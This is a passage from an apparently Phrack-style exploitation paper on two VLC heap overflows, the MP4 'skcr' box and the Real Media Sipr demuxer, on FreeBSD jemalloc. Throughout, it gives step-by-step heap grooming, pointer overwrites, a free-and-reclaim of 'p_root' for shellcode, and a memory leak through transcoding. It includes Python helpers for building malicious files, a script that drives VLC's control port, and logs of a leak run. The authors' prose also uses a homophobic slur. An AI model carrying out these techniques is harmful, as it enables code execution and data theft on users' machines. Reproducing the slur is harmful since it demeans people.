the 8 bytes written outside its bounds can only influence neighboring
|
|
allocations of equal size, namely 4. Exploit developers know that the
|
|
heap has to be specially prepared before triggering an overflow. For
|
|
this specific vulnerability, the attacker has to force VLC to place
|
|
4-byte allocations of interest next to the victim structure. Looking
|
|
carefully in libmp4.h, reveals the following two box types which seem
|
|
to be interesting:
|
|
|
|
|
|
typedef struct {
|
|
char *psz_text;
|
|
} MP4_Box_data_0xa9xxx_t;
|
|
|
|
...
|
|
|
|
typedef struct MP4_Box_data_cmov_s {
|
|
struct MP4_Box_s *p_moov;
|
|
} MP4_Box_data_cmov_t;
|
|
|
|
|
|
Obviously, both structures are 4 bytes long and thus good target
|
|
candidates. 'MP4_Box_data_0xa9xxx_t' holds a pointer to a string we
|
|
control, and 'MP4_Box_data_cmov_t' a pointer to some 'MP4_Box_t' whose
|
|
type and contents may be partially influenced by the attacker. Let's focus
|
|
on the 'cmov' box first and why that 'p_moov' pointer is interesting. What
|
|
can we do if we eventually manage to place a 'cmov' box next to the victim
|
|
'frma' structure?
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:2882 */
|
|
MP4_Box_t *MP4_BoxGetRoot(...) {
|
|
...
|
|
|
|
/* If parsing is successful... */
|
|
if(i_result) {
|
|
MP4_Box_t *p_moov;
|
|
MP4_Box_t *p_cmov;
|
|
|
|
/* Check if there is a cmov... */
|
|
if(((p_moov = MP4_BoxGet(p_root, "moov")) &&
|
|
(p_cmov = MP4_BoxGet(p_root, "moov/cmov"))) ||
|
|
((p_moov = MP4_BoxGet(p_root, "foov")) &&
|
|
(p_cmov = MP4_BoxGet(p_root, "foov/cmov")))) {
|
|
|
|
...
|
|
p_moov = p_cmov->data.p_cmov->p_moov; /* (1) */
|
|
...
|
|
p_moov->p_father = p_root; /* (2) */
|
|
...
|
|
}
|
|
}
|
|
|
|
return p_root;
|
|
}
|
|
|
|
|
|
'MP4_BoxGetRoot()' is the entry point of VLC's MP4 file parser. The
|
|
first 'if' block is entered when parsing has finished and everything
|
|
has gone smoothly; only fatal errors are taken into account. Certain
|
|
erroneous conditions are gracefully handled by aborting the parsing
|
|
process of the current tree node and continuing to the parent. The
|
|
second 'if' block looks up the 'cmov' box and, if one is found, VLC
|
|
will store the 'p_cmov->p_moov' in a local variable called 'p_moov'
|
|
(1). If we manage to overwrite the 'cmov' structure, then the value of
|
|
'p_moov' may arbitrarily be set by us. Then, at (2), an 'unlink()' style
|
|
pointer exchange takes place which will allow us to write the 'p_root'
|
|
pointer on a memory region of our choice.
|
|
|
|
But wait a minute... We control the address that 'p_root' is written
|
|
to, not 'p_root' nor the contents of the memory it points to. We need
|
|
to figure out a way of affecting the data at the location pointed to by
|
|
'p_root'. If we get to do that, then writing 'p_root' in a properly
|
|
selected .got entry may result in code execution.
|
|
|
|
For now, let's forget about 'p_root' and find a way of overwriting the
|
|
'p_moov' field of a 'cmov' box. First we need to perform several 4-byte
|
|
allocations to stabilize the heap and make sure that the 8 bytes to
|
|
be written to the adjacent regions will not end up in neighboring
|
|
run/chunk metadata. Such a situation may cause a segmentation fault on
|
|
the next call to 'malloc()'; that's something we would definitely like
|
|
to avoid. The tool for performing user controlled allocations is called
|
|
'MP4_ReadBox_0xa9xxx()', the function responsible for parsing boxes of
|
|
type 'MP4_Box_data_0xa9xxx_t'. A careful look at its code reveals that
|
|
we can allocate a string of any size we please; 'AAA\0' is exactly what
|
|
we need right now ;)
|
|
|
|
Now recall that in certain cases, when the target application is
|
|
threaded and has 'opt_mag' enabled, jemalloc will return memory regions
|
|
in descending memory addresses which is the case with VLC during the
|
|
MP4 parsing process. Extra threads are created and used to pre-process
|
|
the files, download album artwork and so on. What we really need to do
|
|
is force the heap to be shaped as shown below:
|
|
|
|
|
|
...[SKCR][JUNK][CMOV][AAA\0][AAA\0][AAA\0]...[AAA\0]...
|
|
- +
|
|
|
|
|
|
'JUNK' stands for a 1-byte allocation caused by a call to 'strdup("")'
|
|
right after 'cmov' is created. The 1-byte allocation ends up being serviced
|
|
by bin-4 since 4 is the minimum allocation granularity for the jemalloc
|
|
variant used in FreeBSD-8.2-RELEASE. The heap layout depicted above is
|
|
pretty straightforward to achieve; the attacker just creates a container
|
|
that holds several '0xa9xxx' boxes followed by 'cmov' and then an 'skcr'
|
|
that will overwrite the 'JUNK' and the 'p_moov' field of the 'cmov'
|
|
neighbor. The multithreading nature of VLC will result in the boxes
|
|
being allocated in reverse order, exactly as shown above.
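
In file terms this is just a matter of emitting the children in the right
order. In the sketch below, a9_box() and cmov_box() are hypothetical
helpers standing in for the real encodings (the attached mp4.py takes care
of those), 'udta' is merely one container type that will happily hold them,
and skcr_box()/container() come from the earlier sketches. Since the
magazine hands out regions at decreasing addresses, whatever is parsed
first ends up highest in memory:


def grooming_container(p_moov_value):
    children  = [a9_box(b"AAA")] * 8      # parsed first -> highest addresses,
                                          # also soaks up stray 4-byte holes
    children += [cmov_box()]              # parsed next -> just below the fillers
    # parsed last -> lowest; its 8 overflow bytes run upwards, first over the
    # strdup("") junk (i_encr) and then over cmov's p_moov (i_decr)
    children += [skcr_box(0x41414141, 0x41414141, p_moov_value)]
    return container(b"udta", children)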
|
|
|
|
We have successfully managed to overwrite the 'p_moov' pointer that acts
|
|
as the destination address in the 'unlink()' style pointer exchange. The
|
|
question of how we can control 'p_root' still remains unanswered.
|
|
|
|
|
|
----[ 3.4 - Controlling 'p_root' data
|
|
|
|
Long nights of auditing VLC revealed that there's no easy way for us to
|
|
control the memory contents pointed by 'p_root'. Although we had began
|
|
feeling lost, we came up with a very daring idea that, although dangerous
|
|
at first hearing, we were quite confident that would eventually work
|
|
fine: Why not somehow 'free()' the 'p_root' region? Releasing 'p_root'
|
|
memory and performing several 64-byte (= sizeof(MP4_Box_t)) allocations
|
|
will force jemalloc give 'p_root' back to us. '0xa9xxx' boxes can be
|
|
used to perform user controlled allocations, so, theoretically are ideal
|
|
for what we need. Suppose 'p_root' is freed, then a series of 'a9xxx'
|
|
boxes that contain 64-byte opcodes will result in 'p_root' eventually
|
|
holding our shellcode payload... Right?
|
|
|
|
Two questions now arise. First, how can one know the address of 'p_root'
|
|
in order to free it? This is a good question, but it's something we will
|
|
be dealing with later. Second, each '0xa9xxx' box results in two 64-byte
|
|
allocations; one for the 'MP4_Box_t' structure to hold the box itself and
|
|
one for the string that will contain our shellcode. How can we guarantee
|
|
that 'p_root' will be given back by jemalloc for the string allocation and
|
|
thus not for the 'MP4_Box_t'? This is where 'chpl' boxes come in handy:
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:2413 */
|
|
static int MP4_ReadBox_chpl(..., MP4_Box_t *p_box) {
|
|
MP4_READBOX_ENTER(MP4_Box_data_chpl_t);
|
|
|
|
MP4_GET1BYTE( p_chpl->i_chapter ); /* Chapter count; user controlled */
|
|
|
|
for(i = 0; i < p_chpl->i_chapter; i++) {
|
|
...
|
|
MP4_GET1BYTE( i_len ); /* Name length; user controlled */
|
|
|
|
p_chpl->chapter[i].psz_name = malloc(i_len + 1);
|
|
...
|
|
|
|
/* 'psz_name' contents; user controlled */
|
|
memcpy( p_chpl->chapter[i].psz_name, p_peek, i_copy );
|
|
...
|
|
}
|
|
...
|
|
}
|
|
|
|
|
|
Each 'chpl' box can be used to perform a series of 254 allocations of 64
|
|
bytes thus increasing the possibility that 'p_root' will be returned for
|
|
our data, not for the 'MP4_Box_t' that describes the 'chpl' node (254/255
|
|
versus 1/255; without even taking into account the determinism of heap
|
|
internals).
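
The spray itself is then nothing more than a train of maximum-length
chapter names. In the sketch below chpl_box() is a hypothetical helper for
the chapter-table encoding; the only point that matters is that every name
triggers a malloc(i_len + 1), so 63-byte names land in the same 64-byte
size class as 'MP4_Box_t':


def chpl_spray(fake_region, count=254):
    # each chapter name becomes one 64-byte allocation filled with our
    # bytes; if jemalloc recycles the freed 'p_root' for one of them,
    # 'p_root' ends up pointing at data we fully control
    assert len(fake_region) <= 63
    names = [fake_region.ljust(63, b"\x90")] * count
    return chpl_box(names)   # hypothetical: emits i_chapter, then one length
                             # byte plus the name (and whatever else) per entry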
|
|
|
|
We have successfully located a gadget that will allow us to control
|
|
'p_root' data but only once the latter has been freed. Now recall that
|
|
'a9xxx' boxes are 4 bytes long and can thus be placed right next to the
|
|
victim 'frma' structure. Don't forget that at this specific time frame
|
|
of the execution, bin sized allocations are always serviced by magazine
|
|
racks and thus decreasing addresses are eventually returned to the user.
|
|
|
|
|
|
...[SKCR][A9XXX][A9XXX]...
|
|
- +
|
|
|
|
|
|
Each call to 'MP4_ReadBox_skcr()' will write 8 bytes off the 'skcr'
|
|
boundaries, so, both of the following 'a9xxx' regions will be overflown
|
|
resulting in their 'psz_text' pointer being overwritten with user
|
|
controlled values. If we could somehow force the 'a9xxx' nodes to be
|
|
freed, their 'psz_text' would be passed to 'free()' as well, resulting
|
|
in the release of two heap regions chosen by the attacker. It turns out
|
|
that doing so is not that hard. All we have to do is place those 'skcr'
|
|
and 'a9xxx' boxes within a common container, which will cause a parsing
|
|
error right after the 'skcr' box is parsed. To do that, we abuse a new
|
|
type of MP4 box called 'stts':
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:788 */
|
|
static int MP4_ReadBox_stts(..., MP4_Box_t *p_box) {
|
|
|
|
MP4_READBOX_ENTER(MP4_Box_data_stts_t);
|
|
...
|
|
MP4_GET4BYTES(p_box->data.p_stts->i_entry_count);
|
|
|
|
p_box->data.p_stts->i_sample_count =
|
|
calloc(p_box->data.p_stts->i_entry_count, sizeof(uint32_t)); /* (1) */
|
|
...
|
|
|
|
if(p_box->data.p_stts->i_sample_count == NULL ...) {
|
|
MP4_READBOX_EXIT(0);
|
|
}
|
|
...
|
|
}
|
|
|
|
|
|
At (1), 'i_entry_count' is, obviously, user controlled. Forcing it to
|
|
hold a very high value will result in 'calloc()' returning NULL and thus
|
|
'MP4_ReadBox_stts()' returning 0; the value that indicates a parsing
|
|
failure. Adding the corrupted '0xa9xxx' boxes and the 'skcr' victim in
|
|
the same container with an invalid 'stts' box, will result in the first
|
|
being freed when the parsing error is detected and thus the attacker
|
|
chosen heap regions to be freed*. VLC will continue reading the rest of
|
|
the MP4 data as if nothing wrong has happened.
|
|
|
|
Note: It's crucial to understand that we shouldn't trigger a fatal
|
|
parsing error at this point since the unlink-like code will never be
|
|
reached. In fact, the process of doing that is slightly more complicated
|
|
than described in the previous paragraph; it's a minor detail that should
|
|
not be taken into account right now.
|
|
|
|
|
|
----[ 3.5 MP4 exploitation sum up
|
|
|
|
To sum up, for this first part of the exploitation process the attacker
|
|
must perform the following steps:
|
|
|
|
|
|
1 - Overwrite 'p_moov'
|
|
|
|
1a - Allocate several 'a9xxx' boxes that will stabilize the heap
|
|
|
|
1b - Allocate a 'cmov' box
|
|
|
|
1c - Allocate and fill an 'skcr' box. The 'skcr' handling code will
|
|
allocate an 'frma' structure (4 bytes) and write 12 bytes in its region
|
|
thus eventually overwriting 'cmov->p_moov'
|
|
|
|
2 - Free and control 'p_root' contents
|
|
|
|
2a - Create a 'cmov' container
|
|
|
|
2b - Fill it with 2 '0xa9xxx' boxes
|
|
|
|
2c - Add an 'skcr' that will overwrite the adjacent '0xa9xxx' boxes. The
|
|
overwritten values should be the address of 'p_root' and a random 64
|
|
byte allocation in this specific order.
|
|
|
|
2d - Add an invalid 'stts' box that will force the parsing process
|
|
to fail, the 'cmov' and its children (two '0xa9xxx' and one 'skcr')
|
|
to be freed, the 'psz_text' members of 'MP4_Box_data_0xa9xxx_t' to be
|
|
passed to 'free()' and consequently, 'p_root' to be released.
|
|
|
|
2e - Add several 'chpl' boxes. Each one will result in 254 64byte
|
|
allocations with user controlled contents. Pray that jemalloc will give
|
|
'p_root' back to you (most likely).
|
|
|
|
3 - Repeat step 2 as many times as you please to free as many pointers
|
|
as you like (more on this later)
|
|
|
|
4 - Properly pack everything together so that the 'unlink()' code
|
|
is reached.
|
|
|
|
|
|
One problem still remains; How can one know the address of 'p_root' in
|
|
order to pass it to 'free()'? This is where an information leak would
|
|
be useful. We need to find a bug that when properly exploited will
|
|
reveal data of selected memory regions. Additionally, we need to seek
|
|
the mechanisms by which this data will be returned to the attacker. The
|
|
next section of this phile focuses on these two problems and the voodoo
|
|
required to solve them.
|
|
|
|
|
|
--[ 4 - Real Media 'DemuxAudioSipr()' heap overflow vulnerability
|
|
|
|
----[ 4.1 - VLC as a transcoder
|
|
|
|
Apart from a full blown media player, VLC can also work as a
|
|
transcoder. Transcoding is the process of receiving numerous inputs,
|
|
applying certain transformations on the input data and then sending the
|
|
result to a set of outputs. This is, for example, what happens when you
|
|
rip a DVD and convert it to an .avi stored on your hard disk. In its most
|
|
simple use, transcoding may be used to duplicate an input stream to both
|
|
your soundcard as well as an alternate output, for example, an RTP/HTTP
|
|
network stream, so that other users can listen to the music you're
|
|
currently listening; a mechanism invaluable for your favorite pr0n. For
|
|
more information and some neat examples of using VLC in more advanced
|
|
scenarios, you can have a look at the VideoLan wiki and especially at [5].
|
|
|
|
Trying to find a way to leak memory from VLC, we carefully studied several
|
|
examples from the wiki page at [5] and then started feeding VLC with a
|
|
bunch of mysterious options; we even discovered a FreeBSD kernel 0day while
|
|
doing so. After messing with the command line arguments for a couple of
|
|
minutes we settled down to the following:
|
|
|
|
|
|
vlc ass_traffic.mp4 :sout='#std{access=file,mux=raw,dst=dup.mp4}'
|
|
|
|
|
|
This command, which is just a primitive usage of VLC's transcoding
|
|
features, will just copy 'ass_traffic.mp4' to 'dup.mp4' thus duplicating
|
|
the input stream to a standard file. Furthermore, if VLC is running in
|
|
daemon mode, it is possible for the user to specify a different output
|
|
MRL (Media Resource Location) per media file. For example, assume that
|
|
VLC was started using the command line 'VLC --rc-host 127.0.0.1:8080';
|
|
connecting to port 8080 using netcat and issuing the command...
|
|
|
|
|
|
add /tmp/ass_traffic.mp4 :sout=#std{access=file,mux=raw,dst=/tmp/dup.mp4}
|
|
|
|
|
|
...will, obviously, do the exact same thing. If we could discover an
|
|
information leak, transcoding would be the perfect way of actually having
|
|
VLC return leaked data back to us. For example, what if we could force VLC
|
|
to treat arbitrary memory addresses as simple sound information? If we manage
|
|
to do that, then with the help of the transcoding features we could ask
|
|
VLC to dump the memory range in question in a standard file in /tmp :)
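
Driving all of this from a script is trivial; the following is a minimal
sketch of what our exploit does over the RC interface (host, port and file
paths are placeholders):


import socket

def rc_play(host, port, mrl, dump=None):
    # queue a file on a "vlc --rc-host host:port" instance; the optional
    # :sout part makes VLC duplicate whatever it plays (including leaked
    # memory disguised as audio) into a file we can read back afterwards
    cmd = "add " + mrl
    if dump:
        cmd += " :sout=#std{access=file,mux=raw,dst=%s}" % dump
    s = socket.create_connection((host, port))
    s.sendall((cmd + "\n").encode())
    s.close()

rc_play("127.0.0.1", 8080, "/tmp/leak.rmf", dump="/tmp/leaked_data.rmf")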
|
|
|
|
Note: The truth is that we first focused on exploiting a vulnerability
|
|
that we could turn into a memory disclosure and then explored the
|
|
transcoding stuff. We decided to talk about transcoding first so that
|
|
the reader can keep it in mind while studying the RMF vulnerability
|
|
in the sections that follow.
|
|
|
|
In the days that followed we thoroughly analyzed several public
|
|
vulnerabilities. A specific commit diff in VLC's git caught our attention.
|
|
It was a vulnerability regarding the Real Media format parser discovered by
|
|
Hossein Lotfi [6]. Before actually touching the Real Media demuxer, a quick
|
|
look in the media format itself is essential.
|
|
|
|
|
|
----[ 4.2 - RMF? What's that?
|
|
|
|
Source code for the real media demuxer can be found in
|
|
modules/demux/real.c; the code itself is not very complex and can be easily
|
|
analyzed in a couple of hours. From what we've understood by studying the
|
|
source, there are two kinds of Real Media files; the Real Audio (.ra)
|
|
files, as well as the Real Media Format (.rmf) files. In fact, the two
|
|
formats are quite similar with the one being a newer version of the other.
|
|
Audio information is split in tracks, usually interleaved, so that a file
|
|
may have several tracks each one encoded using a different audio codec.
|
|
|
|
The vulnerability we will be analyzing can be triggered with a specially
|
|
crafted RMF file that utilizes the Sipr audio codec (see [7] and [8]).
|
|
|
|
The meta-information present in RMF files is split in various chunks;
|
|
simple headers followed by their data. A special chunk, called MDPR
|
|
(MeDia PRoperties) is used to encode information regarding a track in
|
|
the RMF file (each track has its own associated MDPR header); its name,
|
|
its duration, its title as well as the track identifier, a simple 32-bit
|
|
integer.
|
|
|
|
The sound information, the one you hear when playing a file, is split in
|
|
packets, each one carrying the track ID for the track whose data it
|
|
contains (as we have already mentioned, track data may be interleaved, so
|
|
the file parser has to know what packet belongs to what track). The sipr
|
|
codec goes further by allowing a packet to contain subpackets. When a
|
|
packet with multiple subpackets is encountered, its contents are buffered
|
|
until all subpackets have been processed. It's only then that the data
|
|
is sent to your audio card or to any pending output streams ;)
|
|
|
|
Sipr subpacket handling is where the mess begins...
|
|
|
|
|
|
----[ 4.3 - Vulnerability details
|
|
|
|
Every time a new packet is encountered in the input stream, VLC will check
|
|
the track it belongs and figure out the audio codec for the track in
|
|
question. Depending on this information, the appropriate audio demuxer is
|
|
called. For sipr packets, 'DemuxAudioSipr()' is the function responsible
|
|
for this task.
|
|
|
|
|
|
/* modules/demux/real.c:788 */
|
|
static void DemuxAudioSipr(..., real_track_t *tk, ...) {
|
|
...
|
|
|
|
block_t *p_block = tk->p_sipr_packet;
|
|
...
|
|
|
|
/* First occurrence of a subpacket for this packet? Create a new block
|
|
* to buffer all the subpackets.
|
|
*
|
|
* Subpackets have a size equal to 'i_frame_size' and 'i_subpacket_h' is
|
|
* their number.
|
|
*/
|
|
if(!p_block) {
|
|
/* (1) */
|
|
p_block = block_New(..., tk->i_frame_size * tk->i_subpacket_h);
|
|
...
|
|
|
|
tk->p_sipr_packet = p_block;
|
|
}
|
|
|
|
/* (2) */
|
|
memcpy(p_block->p_buffer + tk->i_sipr_subpacket_count * tk->i_frame_size,
|
|
p_sys->buffer, tk->i_frame_size);
|
|
...
|
|
|
|
/* Checks that all subpackets for this packet have been processed, if not
|
|
* returns to the demuxer.
|
|
*/
|
|
if(++tk->i_sipr_subpacket_count < tk->i_subpacket_h)
|
|
return;
|
|
...
|
|
|
|
/* All subpackets arrived; send data to all consumers. */
|
|
es_out_Send(p_demux->out, tk->p_es, p_block);
|
|
}
|
|
|
|
|
|
For now assume that 'block_New()', called at (1), is a simple call to
|
|
'malloc()'. Obviously, setting 'i_subpacket_h' to 0 will result in a call
|
|
very similar to 'malloc(0)'. As we have mentioned in our main jemalloc
|
|
paper, a call to 'malloc(0)' returns a region of the smallest size class.
|
|
If 'i_frame_size' is bigger than the minimal space reserved by 'malloc(0)',
|
|
then the call to 'memcpy()' at (2) will result in neighboring heap
|
|
allocations being corrupted (that simple ;p).
|
|
|
|
|
|
----[ 4.4 - 'p_blocks' all over the place
|
|
|
|
Since we have successfully identified the vulnerability, it is time
|
|
to search for possible target structures. Before continuing, we must
|
|
have a look at that 'block_t' structure used to buffer the subpackets;
|
|
its definition can be found at include/vlc_block.h:101.
|
|
|
|
|
|
typedef void (*block_free_t) (block_t *);
|
|
|
|
struct block_t {
|
|
block_t *p_next;
|
|
uint32_t i_flags;
|
|
mtime_t i_pts;
|
|
mtime_t i_dts;
|
|
mtime_t i_length;
|
|
unsigned i_nb_samples;
|
|
int i_rate;
|
|
size_t i_buffer;
|
|
uint8_t *p_buffer;
|
|
block_free_t pf_release;
|
|
};
|
|
|
|
|
|
I know what you're probably thinking; stop staring at that function
|
|
pointer ;) Yes we can very easily overflow it and consequently gain direct
|
|
code execution. Nevertheless, we decided not to take the easy road;
|
|
after all, we are only interested in forcing VLC leak memory contents
|
|
back to us. Assume function pointers have not been discovered yet ;p
|
|
The structure still looks quite promising; notice how 'i_buffer', the
|
|
size of the audio data pointed by the 'p_buffer' pointer, lies before
|
|
'p_buffer' itself... But what exactly is that 'p_buffer' anyway? When
|
|
and how is it allocated?
|
|
|
|
Here's another interesting story regarding audio blocks. Having a look
|
|
at src/misc/block.c, line 99, in function 'block_Alloc()' reveals that
|
|
block headers always lie before the data pointed by 'p_buffer'. When,
|
|
for example, the user requests a block of 16 bytes, 'block_Alloc()' will
|
|
add 16 to the metadata overhead, say N bytes, thus eventually allocating
|
|
16 + N bytes. The 'p_buffer' pointer will then be set to point to the start
|
|
of the actual buffer, right after the 'block_t' header as depicted below.
|
|
|
|
|
|
p_buffer
|
|
.-----.
|
|
| |
|
|
| v
|
|
.---------.----------------------.
|
|
| block_t | ... audio data ... |
|
|
'---------'----------------------'
|
|
|
|
|
|
The relevant code is shown below:
|
|
|
|
|
|
struct block_sys_t {
|
|
block_t self;
|
|
size_t i_allocated_buffer;
|
|
uint8_t p_allocated_buffer[];
|
|
};
|
|
...
|
|
|
|
#define BLOCK_ALIGN 16
|
|
...
|
|
|
|
#define BLOCK_PADDING 32
|
|
...
|
|
|
|
block_t *block_Alloc(size_t i_size) {
|
|
...
|
|
block_sys_t *p_sys;
|
|
uint8_t *buf;
|
|
|
|
#define ALIGN(x) (((x) + BLOCK_ALIGN - 1) & ~(BLOCK_ALIGN - 1))
|
|
|
|
/* (1) */
|
|
const size_t i_alloc = sizeof(*p_sys) + BLOCK_ALIGN +
|
|
(2 * BLOCK_PADDING) + ALIGN(i_size);
|
|
|
|
p_sys = malloc(i_alloc);
|
|
...
|
|
|
|
/* 'buf' is assigned to 'block_t->p_buffer' by 'block_Init()' */
|
|
buf = (void *)ALIGN((uintptr_t)p_sys->p_allocated_buffer);
|
|
buf += BLOCK_PADDING;
|
|
block_Init(&p_sys->self, buf, i_size);
|
|
...
|
|
|
|
return &p_sys->self;
|
|
}
|
|
|
|
|
|
Taking a look back at 'DemuxAudioSipr()', we can see that if
|
|
'i_subpacket_h' is set to 0, then 'block_New()', a macro that is
|
|
substituted with 'block_Alloc()', results in the latter receiving a
|
|
value for 'i_size' equal to 0. Setting 'i_size' to 0 at (1), results in
|
|
'i_alloc' being assigned the value 136. Now do the math; 136 is slightly
|
|
larger than 128 so it will be serviced by jemalloc's bin for 192-byte
|
|
regions. 192 - 136 = 56; 56 is the size margin for the parameter passed
|
|
to 'block_Alloc()'; for the blocks to be placed one next to the other,
|
|
they must reside in the same size class, so, we must make sure the total
|
|
length of the subpackets does not exceed 56. For a packet containing
|
|
two subpackets, a wise choice is to set 'i_frame_size' to 20, so that 2 *
|
|
20 (< 56) plus the overhead is also serviced by bin-192. Unfortunately,
|
|
'i_frame_size' cannot take arbitrary values; it can only get a set of
|
|
predefined ones with 20 being the smallest.
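
The arithmetic, spelled out below; note that the 56 used for
sizeof(block_sys_t) is not measured anywhere, it is simply the value that
makes the i_alloc = 136 figure above work out on 32-bit x86:


# 56 == sizeof(block_sys_t), derived from i_alloc(0) == 136
BLOCK_ALIGN, BLOCK_PADDING, HDR = 16, 32, 56

def i_alloc(i_size):
    align = lambda x: (x + BLOCK_ALIGN - 1) & ~(BLOCK_ALIGN - 1)
    return HDR + BLOCK_ALIGN + 2 * BLOCK_PADDING + align(i_size)

print(i_alloc(0))       # 136 -> the victim block, serviced by bin-192
print(i_alloc(2 * 20))  # 184 -> the target block (2 subpackets of 20), same bin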
|
|
|
|
Beautiful! Since 'block_t' allocations are always accompanied by their
|
|
buffer, it means that the 'memcpy()' call at (2) in 'DemuxAudioSipr()',
|
|
when writing past the boundaries of the victim buffer, may actually
|
|
overwrite the header of an adjacent audio block; its 'p_buffer', its
|
|
'i_buffer' and even its function pointer (but let's ignore this fact for
|
|
now; abusing the function pointer is trivial and we decided not to deal
|
|
with it).
|
|
|
|
Now, a few more things to note:
|
|
|
|
1 - We know that if one packet has two, for example, subpackets, then
|
|
its 'p_block' will be alive until all subpackets have been processed;
|
|
when they are no longer needed, they will be freed resulting in a small
|
|
hole in the heap. Obviously, the lifetime of a 'p_block' is directly
|
|
related to the number of its subpackets.
|
|
|
|
2 - Checking how 'DemuxAudioSipr()' works reveals that a packet
|
|
with 0 subpackets is treated as if it had 1 subpacket. The 'memcpy()'
|
|
call at (2) will overflow the adjacent heap regions and then, when its
|
|
processing has finished, the packet will be freed by 'es_out_Send()'.
|
|
|
|
By combining the facts above, it turns out we can:
|
|
|
|
1 - Use the RMF metadata (MDPR chunks) to define two tracks. Both
|
|
tracks must use the sipr audio codec. Each packet of the first must
|
|
have 2 subpackets and each packet of the second 0 subpackets for the
|
|
vulnerability to be triggered.
|
|
|
|
2 - Force VLC to play the first subpacket of a packet of the first track. A
|
|
new 'block_t' will be allocated. In the diagram below, 't1s1' stands for
|
|
'track 1 subpacket 1'.
|
|
|
|
|
|
.---------.-------.
|
|
| block_t | t1s1 |
|
|
'---------'-------'
|
|
|
|
|
|
3 - Force VLC to play the packet of the second track; the one that has
|
|
0 subpackets. A new 'block_t' will eventually be allocated. We have
|
|
to specially prepare the heap so that the new block is placed directly
|
|
behind the one initialized at step 2.
|
|
|
|
|
|
.---------.------..---------.------.
|
|
| block_t | t2s0 || block_t | t1s1 |
|
|
'---------'------''---------'------'
|
|
|
|
|
|
An overflow will take place thus overwriting the block header of the
|
|
block allocated in the previous step. We are interested in overwriting
|
|
the 'p_buffer' to make it point to a memory region of our choice and
|
|
'i_buffer' to the number of bytes we want to be leaked.
|
|
|
|
4 - Feed VLC with the second subpacket for the first track. Since the
|
|
first subpacket was processed at step 2, the old 'block_t' will be
|
|
used. If everything goes fine, its 'p_buffer' will point where we set
|
|
it to and 'i_buffer' will contain a size of our choice. The 'memcpy()'
|
|
call at (2) in 'DemuxAudioSipr()' will write 'i_frame_size' bytes at our
|
|
chosen address thus trashing the memory a bit, but when 'es_out_Send()'
|
|
is called, 'i_buffer' bytes starting at the address 'p_buffer' points to
|
|
will be sent to the soundcard or any output stream requested by the user!
|
|
|
|
Note: Well yeah it wasn't that simple... 'es_out_Send()' calls a hell of
|
|
other functions to process the audio blocks, break them down in smaller
|
|
blocks, forward them to the output streams and so on. Debugging this
|
|
process was a very tiresome task; it became apparent that the target,
|
|
the overflown 'block_t' header had to obey to certain rules so that
|
|
it wasn't discarded. For example, all packets carry a timestamp;
|
|
the timestamp of the overflown block must be within a range of valid
|
|
timestamps, otherwise it's considered stale and dropped!
|
|
|
|
The following logs correspond to one of our early tests; we used a
|
|
specially crafted .rmf file to leak 65k of data starting at the binary's
|
|
.data section.
|
|
|
|
[hk@lsd ~/src/vlc_exp/leak]$ cat youporn.sh
|
|
vlc leak.rmf :sout='#std{access=file,mux=raw,dst=leaked_data.rmf}' \
|
|
vlc://quit
|
|
|
|
[hk@lsd ~/src/vlc_exp/leak]$ source youporn.sh
|
|
VLC media player 1.1.8 The Luggage (revision exported)
|
|
...
|
|
[hk@lsd ~/src/vlc_exp/leak]$ ls -lah leaked_data.rmf
|
|
-rwxr-xr-x 1 hk hk 128K Mar 31 22:27 leaked_data.rmf
|
|
|
|
We got back 128k which is about twice as much as we requested. In fact,
|
|
the useful data is 65k; it just happens that it's written in the output
|
|
file twice (minor detail related to block buffering).
|
|
|
|
Careful readers would have probably noticed that we took for granted that
|
|
the victim block will be allocated right before the target. Such a result
|
|
can easily be achieved. The technique we use in our exploit is very
|
|
similar to one of the techniques used in browser exploitation. Briefly,
|
|
we create several tracks (more than 2000) holding packets of 2 subpackets
|
|
of 20 bytes each so that all packets end up being allocated in bin-192. We
|
|
then force the release of two consecutive allocations thus creating two
|
|
adjacent holes in the heap. Then, by following what was said so far,
|
|
we can achieve a reliable information disclosure. Our tests show that
|
|
we can repeat this process around 40 times before VLC crashes (yet this
|
|
is only statistics, beautiful Greek statistics ;p).
|
|
|
|
|
|
----[ 4.5 - RMF summary
|
|
|
|
It's now time to sum up the information leak process. For a successful
|
|
information disclosure, the attacker must perform the following steps:
|
|
|
|
1 - Create 2000 + 1 + 1 tracks. 2000 will be used for heap spraying,
|
|
1 will act as the target and 1 as the victim. The large number of allocations
|
|
will probably result in a new magazine being populated thus guaranteeing
|
|
that new allocations will be returned in the reverse memory order.
|
|
|
|
2 - Force the deallocation of two packets belonging to two consecutive
|
|
tracks. Two adjacent holes will be created. The packet lower in memory
|
|
must be freed first.
|
|
|
|
3 - Play the first subpacket of the target track. The hole in the higher
|
|
address will be assigned to the new block.
|
|
|
|
4 - Play the packet of the victim track. The new block will be given the
|
|
lower heap hole and the overflow will reach the block allocated at step 3.
|
|
|
|
5 - Play the second subpacket of the target track. The memory we want
|
|
to read will be trashed by 20 bytes (= frame size) and then returned in
|
|
the output stream.
|
|
|
|
6 - Watch the epic faggotry evolving in front of your eyes ;)
|
|
|
|
|
|
--[ 5 - Building a reliable exploit
|
|
|
|
----[ 5.1 - Overall process
|
|
|
|
Building a reliable local exploit involves combining all the facts
|
|
and finding a way to locate, within the target process, all pieces of
|
|
information required to achieve code execution. Remember that we don't
|
|
want the user having to manually find any return addresses, return
|
|
locations and so on. The exploit must be autonomous and self contained;
|
|
all required information must be automatically detected.
|
|
|
|
When it comes to the MP4 vulnerability, things are pretty straightforward;
|
|
we just need to figure out where 'p_root' is and then free it.
|
|
Additionally, we need to figure out what value 'p_moov' must be overwritten
|
|
with (i.e. the address of an appropriate .got entry). MP4 exploitation is
|
|
100% reliable; once we have found the values of those two parameters, code
|
|
execution is matter of feeding VLC with a specially crafted MP4 file. For
|
|
more information the reader can have a look at the attached source code and
|
|
more specifically at 'mp4.py'; a Python class used to create those special
|
|
MP4 files that can crash VLC as well as innocent ones that cause no
|
|
problems. The latter are used to force VLC to load 'libmp4_plugin.so' during
|
|
the very first step of the exploitation process.
|
|
|
|
Briefly the exploit we developed performs the following steps:
|
|
|
|
1 - Forces VLC to play an innocent MP4 file so that the target plugin
|
|
is loaded.
|
|
|
|
2 - Parses the ELF headers of the VLC binary in order to locate the
|
|
absolute address of its .got section.
|
|
|
|
3 - Uses a specially crafted RMF file to leak 65k starting at the address
|
|
of the binary's .got.
|
|
|
|
4 - The second entry in the .got table points to the linkmap; a linked
|
|
list that keeps track of the loaded libraries populated by the loader
